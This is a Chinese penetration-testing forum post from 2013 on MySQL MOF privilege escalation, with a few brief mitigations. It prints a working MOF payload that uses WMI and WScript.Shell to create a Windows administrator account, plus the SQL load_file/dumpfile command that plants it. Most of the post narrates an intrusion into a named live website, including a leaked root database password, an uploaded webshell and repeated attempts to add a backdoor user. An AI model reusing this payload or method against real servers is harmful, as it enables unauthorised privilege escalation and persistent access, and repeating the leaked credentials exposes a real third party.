中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]
作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
& E1 p8 N3 U* T3 Q3 B. @
& x; P" ?! T$ C网上公开的一些利用代码:: X- {+ F2 J& V% j5 ~

, r* }. {- ^( L. K#pragma namespace(“\\\\.\\root\\subscription”): I' B2 G! S% l" P  V2 h  h% v& _# X

3 o5 n) o9 }# \/ t' K: winstance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };/ D0 ]( `# w7 A

3 w! P5 C* M; v; H) B0 n$ ?
. z6 i8 A  T& f+ D1 Y  s
4 Y6 o- b  ?8 u. b( N6 O9 J+ O + U" h" f3 x- U# Z" Z# s6 v1 c

3 H2 }/ k- \6 {- N- P连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
8 d. E2 b8 y7 J" K/ o0 q从上面代码来看得出解决办法:2 L$ t  d* \! ^9 h4 E1 ]3 B
' r8 Q0 ^; C4 k: t; |' |( w3 R
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
& v# q% ^0 ~0 b# @" x2 ^( b' x
4 H  f9 c0 S# I: A% N2 J2、禁止使用”WScript.Shel”组件. r( O. ~/ f# x6 }
* Q$ u6 S+ V( c/ M, H0 t( G
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
. i* k/ ?9 z* a4 x1 Y  x* e: h2 @* n) R6 |# Y# }. e* q
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下0 T: R4 j; T, X
( A2 x* T- E0 x7 F* Q
事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权0 G5 x8 q8 A5 J! K

: i! B" K- g' r2 |但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
- s( W) B6 V' g3 L+ p1 L& G! X( u0 Y2 ]% d4 ^# Z$ |
看懂了后就开始练手吧- v/ r5 @+ `# P6 |# f

8 Q* K8 e" K$ ]7 i2 bhttp://www.webbmw.com/config/config_ucenter.php 一句话 a2 }7 R9 }: o% k/ B6 j. L

0 X( n" L% [1 W6 J) S$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
% X5 d2 g. X4 W$ F9 Z* U8 n! j" u3 d3 C
于是直接用菜刀开搞
5 B; y( }1 w* P" M9 A
/ v  P' W! F! A7 F3 g上马先
. h4 g, ?. R6 J0 p9 |! @8 \3 F$ E: v+ O! [: g
既然有了那些账号 之类的 于是我们就执行吧…….
- }* ~! S  N0 z2 ]6 M
# V, u: E9 w. ]  k* ~$ Z小小的说下
$ w2 o9 @  d% p+ _/ B8 x4 u4 E( y/ _& a8 t0 _. c
在这里第1次执行未成功        原因未知7 k) w) c3 h" \/ D- o
6 }5 Y& b3 E4 W0 `; E7 f* {
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。% A8 y5 g( f: y! c" D: q
4 h& }: c+ F$ R; ]# v( M% N2 V
#pragma namespace(“\\\\.\\root\\subscription”)
$ P/ r3 H5 U" }, [* e
- k; F) Z! q/ w* C+ k' Y6 \instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };
1 \; b: X3 B) K, s5 w) Q( n
/ {: j6 [/ d2 s+ I6 \4 O, m我是将文件放到C:\WINDOWS\temp\1.mof
' J- b3 B4 x$ z
% a: h8 t, x3 U% V: G0 }3 U所以我们就改下执行的代码, ~3 I! g3 o6 r+ l4 c
8 A  Q9 ?2 R7 _' H7 K: t& q4 [
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
9 n! G, N4 s3 p  Z/ P  g( J. ^7 z; p& Y& \

& Q$ B4 J0 Y+ S3 q) y
. C+ Q5 v; _$ s- N, u" g但是 你会发现账号还是没有躺在那里。。' z& [% ^9 K) ]( H/ G% I

8 J& c5 K( l7 Q" C+ h7 ]于是我就感觉蛋疼
) ]- ^* n7 _& @/ Q# n! s, u5 D' U# p  W$ h) B) e+ d
就去一个一个去执行 但是执行到第2个 mysql时就成功了………9 I0 U0 t7 ]0 T9 L/ P9 U9 `

# O$ H# ^4 O7 K; M; N( j& Y8 `  }6 @" j  ?! l! Z+ C7 E- b3 a; E( F0 x

* [6 c# t: }9 F" r* J: W' [& H但是其他库均不成功…
  J' C& \  I( ^" z4 K+ d" c5 F5 B$ K7 f9 o, r% i6 P1 K* L
我就很费解呀 到底为什么不成功求大牛解答…
+ b7 D" N" t) Z9 `  ~, I3 y5 K& H. u* v
1 U# l% f0 Q' l: m+ v

# y0 i/ b6 G0 T+ A



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2